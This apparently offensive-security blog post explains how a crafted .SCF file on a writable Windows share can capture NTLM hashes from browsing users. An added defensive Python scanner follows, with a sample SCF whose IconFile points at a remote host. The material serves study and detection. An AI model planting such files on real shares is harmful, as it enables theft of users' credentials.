
Using an SCF File to Gather Hashes
#Security Testing #Offensive Security
Have You Ever Encountered
Have you ever participated in an internal network assessment and found an unauthenticated writable Windows-based file share? In addition to potentially uncovering sensitive information, this situation can be exploited to collect user hashes from individuals browsing the file share. In this type of attack, a specially crafted file with a .SCF extension is placed onto the file share. SCF files can manipulate Windows Explorer; however, in this scenario, we use one to trick an unsuspecting user into revealing their NTLMv1/2 hash to us, the attacker.
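A defender-side check for the situation described above, added here as an example and not code from the original post: it walks a share and reports `.scf` files whose values name a remote UNC host. It assumes a planted file must point Explorer at a host outside the share for any authentication to leave the workstation; the function names and sample file contents are constructed for illustration.

```python
"""Flag .scf files on a share whose values point Explorer at a remote host."""
import re
import sys
from pathlib import Path

# A value is "remote" when it starts with a UNC prefix: \\host\... or //host/...
UNC = re.compile(r'^\s*"?(?:\\\\|//)([^\\/\s"]+)[\\/]')

def decode(raw: bytes) -> str:
    # SCF files are plain text; accept UTF-16 with a BOM as well as ANSI/UTF-8.
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def remote_refs(text: str):
    """Return [(section, key, host)] for every key=value that names a UNC host."""
    hits, section = [], ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            match = UNC.match(value)
            if match:
                hits.append((section, key.strip(), match.group(1)))
    return hits

def scan_share(root):
    """Walk a mounted share; return {path: hits} for .scf files with remote refs."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".scf":
            hits = remote_refs(decode(path.read_bytes()))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed samples: a stock "Show Desktop" shortcut, and a file whose icon
# is fetched from a remote host (198.51.100.7 is a documentation address).
BENIGN = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPECT = "[Shell]\nCommand=2\nIconFile=\\\\198.51.100.7\\share\\icon.ico\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_scf.py <path to mounted share>
        for path, hits in scan_share(sys.argv[1]).items():
            print(path, hits)
    else:
        print("benign:", remote_refs(BENIGN), "suspect:", remote_refs(SUSPECT))
```

Any hit on a user-writable share is worth triaging: record the file's owner and creation time, and check whether the named host is one the organisation controls.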